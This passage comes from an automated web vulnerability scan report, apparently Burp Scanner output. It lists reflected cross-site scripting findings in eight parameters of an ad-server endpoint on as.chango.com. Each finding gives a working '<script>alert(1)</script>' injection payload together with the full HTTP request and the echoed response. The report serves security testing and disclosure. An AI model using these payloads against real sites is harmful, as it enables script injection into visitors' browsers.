Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://optimized-by.rubiconproject.com/a/7845/12566/26848-15.html?
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _i_admeld=1; _i_ca=1; _i_ox=1; _i_cw=1; _i_an=1; _i_ab=1; _t=b6ae888c-d95b-11e0-b096-0025900e0834; _i_rc=1

Response

HTTP/1.1 200 OK
Server: Chango RTB Server
ETag: "94e76ad5f7c529cdda89711f9bf9ce49199412b1"
Pragma: no-cache
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
P3P: policyref="http://as.chango.com/static/w3c/p3p.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Date: Sun, 02 Oct 2011 23:58:59 GMT
Content-Length: 2364
Connection: close
Set-Cookie: _t=b6ae888c-d95b-11e0-b096-0025900e08343d11b9c3808f0d628fbdc6f7; Domain=chango.com; expires=Wed, 29 Sep 2021 23:58:59 GMT; Path=/
Set-Cookie: cc.i.10449=13713%7Cguardian.co.uk%7C5827704%7CRubicon%7C10449%7Cnamemedia%7C11720%7Cbroad; Domain=chango.com; expires=Tue, 01 Nov 2011 23:58:59 GMT; Path=/

<html><head><title></title></head><body style='margin:0;padding:0;'><script type="text/javascript"></script><SCRIPT language='JavaScript1.1' SRC="http://ad.doubleclick.net/adj/N6677.286186.CHANGO/B586
...[SNIP]...
sid=5cadceb4-ed52-11e0-ab71-00259035d426&dc=namemedia&datc=san jose&da=10087&st=broad&bm=1.84336389243&wp=1.5592&kw=Malware+freeware&uf=0&kf=202457&atype=HISTORIC&test=0&adpos=0&bidder=bidder05-sj-west14194"><script>alert(1)</script>1438e1bd2b4&ioi=13672&ts=1317599881920&sig=d9ce9455d859589baae4652880c0ad93&cu=&dsi=None&clickURL=">
...[SNIP]...

4.25. http://as.chango.com/links/adunit/1.31759988192e+12 [datc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://as.chango.com
Path:   /links/adunit/1.31759988192e+12

Issue detail

The value of the datc request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aa5ec"><script>alert(1)</script>1085ffe8a15 was submitted in the datc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /links/adunit/1.31759988192e+12?adid=13713&adpos=0&agid=11720&atype=HISTORIC&bidder=bidder05-sj-west&bm=1.84336389243&cid=10449&da=10087&datc=san+joseaa5ec"><script>alert(1)</script>1085ffe8a15&dc=namemedia&dom=guardian.co.uk&dsi=None&ebp=o2FsgIeco3h8bGWkdw&eid=Rubicon&ht=250&ibs=None&kf=202457&kw=Malware+freeware&kwid=5827704&mw=1.0&poo=p&sid=5cadceb4-ed52-11e0-ab71-00259035d426&st=broad&stid=guardian.co.uk&tkn=b6ae888c-d95b-11e0-b096-0025900e0834&ts=1317599881920&uf=0&uid=b6ae888c-d95b-11e0-b096-0025900e0834&url=http%3A%2F%2Fwww.guardian.co.uk%2Ffootball%2F2011%2Fsep%2F27%2Fmanchester-united-basel-live&wh=300&wp=869757B4845F780B&sig=d9ce9455d859589baae4652880c0ad93 HTTP/1.1
Host: as.chango.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://optimized-by.rubiconproject.com/a/7845/12566/26848-15.html?
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _i_admeld=1; _i_ca=1; _i_ox=1; _i_cw=1; _i_an=1; _i_ab=1; _t=b6ae888c-d95b-11e0-b096-0025900e0834; _i_rc=1

Response

HTTP/1.1 200 OK
Server: Chango RTB Server
ETag: "a29d24cc6e07eb15125d8d1b3ceb62291aecc91c"
Pragma: no-cache
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
P3P: policyref="http://as.chango.com/static/w3c/p3p.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Date: Sun, 02 Oct 2011 23:59:05 GMT
Content-Length: 2364
Connection: close
Set-Cookie: _t=b6ae888c-d95b-11e0-b096-0025900e08343d11b9c3808f0d628fbdc6f7; Domain=chango.com; expires=Wed, 29 Sep 2021 23:59:05 GMT; Path=/
Set-Cookie: cc.i.10449=13713%7Cguardian.co.uk%7C5827704%7CRubicon%7C10449%7Cnamemedia%7C11720%7Cbroad; Domain=chango.com; expires=Tue, 01 Nov 2011 23:59:05 GMT; Path=/

<html><head><title></title></head><body style='margin:0;padding:0;'><script type="text/javascript"></script><SCRIPT language='JavaScript1.1' SRC="http://ad.doubleclick.net/adj/N6677.286186.CHANGO/B586
...[SNIP]...
tball/2011/sep/27/manchester-united-basel-live&dom=guardian.co.uk&ibs=None&mw=1.0&poo=p&kwid=5827704&eid=Rubicon&cid=10449&agid=11720&sid=5cadceb4-ed52-11e0-ab71-00259035d426&dc=namemedia&datc=san joseaa5ec"><script>alert(1)</script>1085ffe8a15&da=10087&st=broad&bm=1.84336389243&wp=1.5592&kw=Malware+freeware&uf=0&kf=202457&atype=HISTORIC&test=0&adpos=0&bidder=bidder05-sj-west&ioi=13672&ts=1317599881920&sig=d9ce9455d859589baae4652880c0ad93&cu
...[SNIP]...

4.26. http://as.chango.com/links/adunit/1.31759988192e+12 [dc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://as.chango.com
Path:   /links/adunit/1.31759988192e+12

Issue detail

The value of the dc request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b406f"><script>alert(1)</script>02b8bac3890 was submitted in the dc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /links/adunit/1.31759988192e+12?adid=13713&adpos=0&agid=11720&atype=HISTORIC&bidder=bidder05-sj-west&bm=1.84336389243&cid=10449&da=10087&datc=san+jose&dc=namemediab406f"><script>alert(1)</script>02b8bac3890&dom=guardian.co.uk&dsi=None&ebp=o2FsgIeco3h8bGWkdw&eid=Rubicon&ht=250&ibs=None&kf=202457&kw=Malware+freeware&kwid=5827704&mw=1.0&poo=p&sid=5cadceb4-ed52-11e0-ab71-00259035d426&st=broad&stid=guardian.co.uk&tkn=b6ae888c-d95b-11e0-b096-0025900e0834&ts=1317599881920&uf=0&uid=b6ae888c-d95b-11e0-b096-0025900e0834&url=http%3A%2F%2Fwww.guardian.co.uk%2Ffootball%2F2011%2Fsep%2F27%2Fmanchester-united-basel-live&wh=300&wp=869757B4845F780B&sig=d9ce9455d859589baae4652880c0ad93 HTTP/1.1
Host: as.chango.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://optimized-by.rubiconproject.com/a/7845/12566/26848-15.html?
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _i_admeld=1; _i_ca=1; _i_ox=1; _i_cw=1; _i_an=1; _i_ab=1; _t=b6ae888c-d95b-11e0-b096-0025900e0834; _i_rc=1

Response

HTTP/1.1 200 OK
Server: Chango RTB Server
ETag: "f2ff7ee7580ca0f599186a62d9136e72ad18ae1a"
Pragma: no-cache
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
P3P: policyref="http://as.chango.com/static/w3c/p3p.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Date: Sun, 02 Oct 2011 23:59:07 GMT
Content-Length: 2364
Connection: close
Set-Cookie: _t=b6ae888c-d95b-11e0-b096-0025900e08343d11b9c3808f0d628fbdc6f7; Domain=chango.com; expires=Wed, 29 Sep 2021 23:59:07 GMT; Path=/
Set-Cookie: cc.i.10449=13713%7Cguardian.co.uk%7C5827704%7CRubicon%7C10449%7Cnamemediab406f%22%3E%3Cscript%3Ealert%281%29%3C/script%3E02b8bac3890%7C11720%7Cbroad; Domain=chango.com; expires=Tue, 01 Nov 2011 23:59:07 GMT; Path=/

<html><head><title></title></head><body style='margin:0;padding:0;'><script type="text/javascript"></script><SCRIPT language='JavaScript1.1' SRC="http://ad.doubleclick.net/adj/N6677.286186.CHANGO/B586
...[SNIP]...
dian.co.uk/football/2011/sep/27/manchester-united-basel-live&dom=guardian.co.uk&ibs=None&mw=1.0&poo=p&kwid=5827704&eid=Rubicon&cid=10449&agid=11720&sid=5cadceb4-ed52-11e0-ab71-00259035d426&dc=namemediab406f"><script>alert(1)</script>02b8bac3890&datc=san jose&da=10087&st=broad&bm=1.84336389243&wp=1.5592&kw=Malware+freeware&uf=0&kf=202457&atype=HISTORIC&test=0&adpos=0&bidder=bidder05-sj-west&ioi=13672&ts=1317599881920&sig=d9ce9455d859589baae46
...[SNIP]...

4.27. http://as.chango.com/links/adunit/1.31759988192e+12 [dom parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://as.chango.com
Path:   /links/adunit/1.31759988192e+12

Issue detail

The value of the dom request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f0e1e"><script>alert(1)</script>6db27d1746e was submitted in the dom parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /links/adunit/1.31759988192e+12?adid=13713&adpos=0&agid=11720&atype=HISTORIC&bidder=bidder05-sj-west&bm=1.84336389243&cid=10449&da=10087&datc=san+jose&dc=namemedia&dom=guardian.co.ukf0e1e"><script>alert(1)</script>6db27d1746e&dsi=None&ebp=o2FsgIeco3h8bGWkdw&eid=Rubicon&ht=250&ibs=None&kf=202457&kw=Malware+freeware&kwid=5827704&mw=1.0&poo=p&sid=5cadceb4-ed52-11e0-ab71-00259035d426&st=broad&stid=guardian.co.uk&tkn=b6ae888c-d95b-11e0-b096-0025900e0834&ts=1317599881920&uf=0&uid=b6ae888c-d95b-11e0-b096-0025900e0834&url=http%3A%2F%2Fwww.guardian.co.uk%2Ffootball%2F2011%2Fsep%2F27%2Fmanchester-united-basel-live&wh=300&wp=869757B4845F780B&sig=d9ce9455d859589baae4652880c0ad93 HTTP/1.1
Host: as.chango.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://optimized-by.rubiconproject.com/a/7845/12566/26848-15.html?
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _i_admeld=1; _i_ca=1; _i_ox=1; _i_cw=1; _i_an=1; _i_ab=1; _t=b6ae888c-d95b-11e0-b096-0025900e0834; _i_rc=1

Response

HTTP/1.1 200 OK
Server: Chango RTB Server
ETag: "3b9cdd9277b1c295e99fb4dc357a0b4d01f3458b"
Pragma: no-cache
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
P3P: policyref="http://as.chango.com/static/w3c/p3p.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Date: Sun, 02 Oct 2011 23:59:10 GMT
Content-Length: 2364
Connection: close
Set-Cookie: _t=b6ae888c-d95b-11e0-b096-0025900e08343d11b9c3808f0d628fbdc6f7; Domain=chango.com; expires=Wed, 29 Sep 2021 23:59:10 GMT; Path=/
Set-Cookie: cc.i.10449=13713%7Cguardian.co.uk%7C5827704%7CRubicon%7C10449%7Cnamemedia%7C11720%7Cbroad; Domain=chango.com; expires=Tue, 01 Nov 2011 23:59:10 GMT; Path=/

<html><head><title></title></head><body style='margin:0;padding:0;'><script type="text/javascript"></script><SCRIPT language='JavaScript1.1' SRC="http://ad.doubleclick.net/adj/N6677.286186.CHANGO/B586
...[SNIP]...
ck1=http://as.chango.com/links/click1317599950.77?acid=10699&adid=13713&agid=11720&stid=guardian.co.uk&url=http://www.guardian.co.uk/football/2011/sep/27/manchester-united-basel-live&dom=guardian.co.ukf0e1e"><script>alert(1)</script>6db27d1746e&ibs=None&mw=1.0&poo=p&kwid=5827704&eid=Rubicon&cid=10449&agid=11720&sid=5cadceb4-ed52-11e0-ab71-00259035d426&dc=namemedia&datc=san jose&da=10087&st=broad&bm=1.84336389243&wp=1.5592&kw=Malware+freeware
...[SNIP]...

4.28. http://as.chango.com/links/adunit/1.31759988192e+12 [eid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://as.chango.com
Path:   /links/adunit/1.31759988192e+12

Issue detail

The value of the eid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8b611"><script>alert(1)</script>1eedbcf2072 was submitted in the eid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /links/adunit/1.31759988192e+12?adid=13713&adpos=0&agid=11720&atype=HISTORIC&bidder=bidder05-sj-west&bm=1.84336389243&cid=10449&da=10087&datc=san+jose&dc=namemedia&dom=guardian.co.uk&dsi=None&ebp=o2FsgIeco3h8bGWkdw&eid=Rubicon8b611"><script>alert(1)</script>1eedbcf2072&ht=250&ibs=None&kf=202457&kw=Malware+freeware&kwid=5827704&mw=1.0&poo=p&sid=5cadceb4-ed52-11e0-ab71-00259035d426&st=broad&stid=guardian.co.uk&tkn=b6ae888c-d95b-11e0-b096-0025900e0834&ts=1317599881920&uf=0&uid=b6ae888c-d95b-11e0-b096-0025900e0834&url=http%3A%2F%2Fwww.guardian.co.uk%2Ffootball%2F2011%2Fsep%2F27%2Fmanchester-united-basel-live&wh=300&wp=869757B4845F780B&sig=d9ce9455d859589baae4652880c0ad93 HTTP/1.1
Host: as.chango.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://optimized-by.rubiconproject.com/a/7845/12566/26848-15.html?
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _i_admeld=1; _i_ca=1; _i_ox=1; _i_cw=1; _i_an=1; _i_ab=1; _t=b6ae888c-d95b-11e0-b096-0025900e0834; _i_rc=1

Response

HTTP/1.1 200 OK
Server: Chango RTB Server
ETag: "59a5142f96efa33ad5f002277312b5f2c31c491d"
Pragma: no-cache
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
P3P: policyref="http://as.chango.com/static/w3c/p3p.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Date: Sun, 02 Oct 2011 23:59:23 GMT
Content-Length: 2349
Connection: close
Set-Cookie: _t=b6ae888c-d95b-11e0-b096-0025900e08343d11b9c3808f0d628fbdc6f7; Domain=chango.com; expires=Wed, 29 Sep 2021 23:59:23 GMT; Path=/
Set-Cookie: cc.i.10449=13713%7Cguardian.co.uk%7C5827704%7CRubicon8b611%22%3E%3Cscript%3Ealert%281%29%3C/script%3E1eedbcf2072%7C10449%7Cnamemedia%7C11720%7Cbroad; Domain=chango.com; expires=Tue, 01 Nov 2011 23:59:23 GMT; Path=/

<html><head><title></title></head><body style='margin:0;padding:0;'><script type="text/javascript"></script><SCRIPT language='JavaScript1.1' SRC="http://ad.doubleclick.net/adj/N6677.286186.CHANGO/B586
...[SNIP]...
36?acid=10699&adid=13713&agid=11720&stid=guardian.co.uk&url=http://www.guardian.co.uk/football/2011/sep/27/manchester-united-basel-live&dom=guardian.co.uk&ibs=None&mw=1.0&poo=p&kwid=5827704&eid=Rubicon8b611"><script>alert(1)</script>1eedbcf2072&cid=10449&agid=11720&sid=5cadceb4-ed52-11e0-ab71-00259035d426&dc=namemedia&datc=san jose&da=10087&st=broad&bm=1.84336389243&wp=0&kw=Malware+freeware&uf=0&kf=202457&atype=HISTORIC&test=0&adpos=0&bidder
...[SNIP]...

4.29. http://as.chango.com/links/adunit/1.31759988192e+12 [ht parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://as.chango.com
Path:   /links/adunit/1.31759988192e+12

Issue detail

The value of the ht request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 45475"><script>alert(1)</script>21ae6b0bc46 was submitted in the ht parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /links/adunit/1.31759988192e+12?adid=13713&adpos=0&agid=11720&atype=HISTORIC&bidder=bidder05-sj-west&bm=1.84336389243&cid=10449&da=10087&datc=san+jose&dc=namemedia&dom=guardian.co.uk&dsi=None&ebp=o2FsgIeco3h8bGWkdw&eid=Rubicon&ht=25045475"><script>alert(1)</script>21ae6b0bc46&ibs=None&kf=202457&kw=Malware+freeware&kwid=5827704&mw=1.0&poo=p&sid=5cadceb4-ed52-11e0-ab71-00259035d426&st=broad&stid=guardian.co.uk&tkn=b6ae888c-d95b-11e0-b096-0025900e0834&ts=1317599881920&uf=0&uid=b6ae888c-d95b-11e0-b096-0025900e0834&url=http%3A%2F%2Fwww.guardian.co.uk%2Ffootball%2F2011%2Fsep%2F27%2Fmanchester-united-basel-live&wh=300&wp=869757B4845F780B&sig=d9ce9455d859589baae4652880c0ad93 HTTP/1.1
Host: as.chango.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://optimized-by.rubiconproject.com/a/7845/12566/26848-15.html?
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _i_admeld=1; _i_ca=1; _i_ox=1; _i_cw=1; _i_an=1; _i_ab=1; _t=b6ae888c-d95b-11e0-b096-0025900e0834; _i_rc=1

Response

HTTP/1.1 200 OK
Content-Length: 588
Server: Chango RTB Server
ETag: "5ba78575886bd3594b59106bc3638a8dfdeb6a66"
Pragma: no-cache
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
P3P: policyref="http://as.chango.com/static/w3c/p3p.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Date: Sun, 02 Oct 2011 23:59:26 GMT
Connection: close
Set-Cookie: _t=b6ae888c-d95b-11e0-b096-0025900e08343d11b9c3808f0d628fbdc6f7; Domain=chango.com; expires=Wed, 29 Sep 2021 23:59:26 GMT; Path=/
Set-Cookie: cc.i.10449=13713%7Cguardian.co.uk%7C5827704%7CRubicon%7C10449%7Cnamemedia%7C11720%7Cbroad; Domain=chango.com; expires=Tue, 01 Nov 2011 23:59:26 GMT; Path=/

<html><head><title></title></head><body style='margin:0;padding:0;'><script type="text/javascript"></script><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml
...[SNIP]...
<body style="width: 300px; height: 25045475"><script>alert(1)</script>21ae6b0bc46px; margin: 0; padding: 0;">
...[SNIP]...

4.30. http://as.chango.com/links/adunit/1.31759988192e+12 [ibs parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://as.chango.com
Path:   /links/adunit/1.31759988192e+12

Issue detail

The value of the ibs request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6dd05"><script>alert(1)</script>4ccae8e57d1 was submitted in the ibs parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /links/adunit/1.31759988192e+12?adid=13713&adpos=0&agid=11720&atype=HISTORIC&bidder=bidder05-sj-west&bm=1.84336389243&cid=10449&da=10087&datc=san+jose&dc=namemedia&dom=guardian.co.uk&dsi=None&ebp=o2FsgIeco3h8bGWkdw&eid=Rubicon&ht=250&ibs=None6dd05"><script>alert(1)</script>4ccae8e57d1&kf=202457&kw=Malware+freeware&kwid=5827704&mw=1.0&poo=p&sid=5cadceb4-ed52-11e0-ab71-00259035d426&st=broad&stid=guardian.co.uk&tkn=b6ae888c-d95b-11e0-b096-0025900e0834&ts=1317599881920&uf=0&uid=b6ae888c-d95b-11e0-b096-0025900e0834&url=http%3A%2F%2Fwww.guardian.co.uk%2Ffootball%2F2011%2Fsep%2F27%2Fmanchester-united-basel-live&wh=300&wp=869757B4845F780B&sig=d9ce9455d859589baae4652880c0ad93 HTTP/1.1
Host: as.chango.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://optimized-by.rubiconproject.com/a/7845/12566/26848-15.html?
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _i_admeld=1; _i_ca=1; _i_ox=1; _i_cw=1; _i_an=1; _i_ab=1; _t=b6ae888c-d95b-11e0-b096-0025900e0834; _i_rc=1

Response

HTTP/1.1 200 OK
Server: Chango RTB Server
ETag: "c9ad73da996eca9026305ba55d6dd77afee7681f"
Pragma: no-cache
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
P3P: policyref="http://as.chango.com/static/w3c/p3p.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Content-Length: 2364
Date: Sun, 02 Oct 2011 23:59:28 GMT
Connection: close
Set-Cookie: _t=b6ae888c-d95b-11e0-b096-0025900e08343d11b9c3808f0d628fbdc6f7; Domain=chango.com; expires=Wed, 29 Sep 2021 23:59:28 GMT; Path=/
Set-Cookie: cc.i.10449=13713%7Cguardian.co.uk%7C5827704%7CRubicon%7C10449%7Cnamemedia%7C11720%7Cbroad; Domain=chango.com; expires=Tue, 01 Nov 2011 23:59:28 GMT; Path=/

<html><head><title></title></head><body style='margin:0;padding:0;'><script type="text/javascript"></script><SCRIPT language='JavaScript1.1' SRC="http://ad.doubleclick.net/adj/N6677.286186.CHANGO/B586
...[SNIP]...
//as.chango.com/links/click1317599968.42?acid=10699&adid=13713&agid=11720&stid=guardian.co.uk&url=http://www.guardian.co.uk/football/2011/sep/27/manchester-united-basel-live&dom=guardian.co.uk&ibs=None6dd05"><script>alert(1)</script>4ccae8e57d1&mw=1.0&poo=p&kwid=5827704&eid=Rubicon&cid=10449&agid=11720&sid=5cadceb4-ed52-11e0-ab71-00259035d426&dc=namemedia&datc=san jose&da=10087&st=broad&bm=1.84336389243&wp=1.5592&kw=Malware+freeware&uf=0&kf=
...[SNIP]...

4.31. http://as.chango.com/links/adunit/1.31759988192e+12 [poo parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://as.chango.com
Path:   /links/adunit/1.31759988192e+12

Issue detail

The value of the poo request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5b15f"><script>alert(1)</script>0aaee42b2aa was submitted in the poo parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /links/adunit/1.31759988192e+12?adid=13713&adpos=0&agid=11720&atype=HISTORIC&bidder=bidder05-sj-west&bm=1.84336389243&cid=10449&da=10087&datc=san+jose&dc=namemedia&dom=guardian.co.uk&dsi=None&ebp=o2FsgIeco3h8bGWkdw&eid=Rubicon&ht=250&ibs=None&kf=202457&kw=Malware+freeware&kwid=5827704&mw=1.0&poo=p5b15f"><script>alert(1)</script>0aaee42b2aa&sid=5cadceb4-ed52-11e0-ab71-00259035d426&st=broad&stid=guardian.co.uk&tkn=b6ae888c-d95b-11e0-b096-0025900e0834&ts=1317599881920&uf=0&uid=b6ae888c-d95b-11e0-b096-0025900e0834&url=http%3A%2F%2Fwww.guardian.co.uk%2Ffootball%2F2011%2Fsep%2F27%2Fmanchester-united-basel-live&wh=300&wp=869757B4845F780B&sig=d9ce9455d859589baae4652880c0ad93 HTTP/1.1
Host: as.chango.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://optimized-by.rubiconproject.com/a/7845/12566/26848-15.html?
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _i_admeld=1; _i_ca=1; _i_ox=1; _i_cw=1; _i_an=1; _i_ab=1; _t=b6ae888c-d95b-11e0-b096-0025900e0834; _i_rc=1

Response

HTTP/1.1 200 OK
Server: Chango RTB Server
ETag: "238ea0fb61ae84561530a6e4e50ebda879606458"
Pragma: no-cache
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
P3P: policyref="http://as.chango.com/static/w3c/p3p.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Content-Length: 2364
Date: Sun, 02 Oct 2011 23:59:38 GMT
Connection: close
Set-Cookie: _t=b6ae888c-d95b-11e0-b096-0025900e08343d11b9c3808f0d628fbdc6f7; Domain=chango.com; expires=Wed, 29 Sep 2021 23:59:38 GMT; Path=/
Set-Cookie: cc.i.10449=13713%7Cguardian.co.uk%7C5827704%7CRubicon%7C10449%7Cnamemedia%7C11720%7Cbroad; Domain=chango.com; expires=Tue, 01 Nov 2011 23:59:38 GMT; Path=/

<html><head><title></title></head><body style='margin:0;padding:0;'><script type="text/javascript"></script><SCRIPT language='JavaScript1.1' SRC="http://ad.doubleclick.net/adj/N6677.286186.CHANGO/B586
...[SNIP]...
om/links/click1317599978.28?acid=10699&adid=13713&agid=11720&stid=guardian.co.uk&url=http://www.guardian.co.uk/football/2011/sep/27/manchester-united-basel-live&dom=guardian.co.uk&ibs=None&mw=1.0&poo=p5b15f"><script>alert(1)</script>0aaee42b2aa&kwid=5827704&eid=Rubicon&cid=10449&agid=11720&sid=5cadceb4-ed52-11e0-ab71-00259035d426&dc=namemedia&datc=san jose&da=10087&st=broad&bm=1.84336389243&wp=1.5592&kw=Malware+freeware&uf=0&kf=202457&atype=
...[SNIP]...

4.32. http://as.chango.com/links/adunit/1.31759988192e+12 [sid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://as.chango.com
Path:   /links/adunit/1.31759988192e+12

Issue detail

The value of the sid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c4215"><script>alert(1)</script>69873abae82 was submitted in the sid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /links/adunit/1.31759988192e+12?adid=13713&adpos=0&agid=11720&atype=HISTORIC&bidder=bidder05-sj-west&bm=1.84336389243&cid=10449&da=10087&datc=san+jose&dc=namemedia&dom=guardian.co.uk&dsi=None&ebp=o2FsgIeco3h8bGWkdw&eid=Rubicon&ht=250&ibs=None&kf=202457&kw=Malware+freeware&kwid=5827704&mw=1.0&poo=p&sid=5cadceb4-ed52-11e0-ab71-00259035d426c4215"><script>alert(1)</script>69873abae82&st=broad&stid=guardian.co.uk&tkn=b6ae888c-d95b-11e0-b096-0025900e0834&ts=1317599881920&uf=0&uid=b6ae888c-d95b-11e0-b096-0025900e0834&url=http%3A%2F%2Fwww.guardian.co.uk%2Ffootball%2F2011%2Fsep%2F27%2Fmanchester-united-basel-live&wh=300&wp=869757B4845F780B&sig=d9ce9455d859589baae4652880c0ad93 HTTP/1.1
Host: as.chango.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://optimized-by.rubiconproject.com/a/7845/12566/26848-15.html?
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _i_admeld=1; _i_ca=1; _i_ox=1; _i_cw=1; _i_an=1; _i_ab=1; _t=b6ae888c-d95b-11e0-b096-0025900e0834; _i_rc=1

Response

HTTP/1.1 200 OK
Server: Chango RTB Server
ETag: "7cff87f18ac98ed42845ee33f9e6e0bf79efaf95"
Pragma: no-cache
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
P3P: policyref="http://as.chango.com/static/w3c/p3p.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
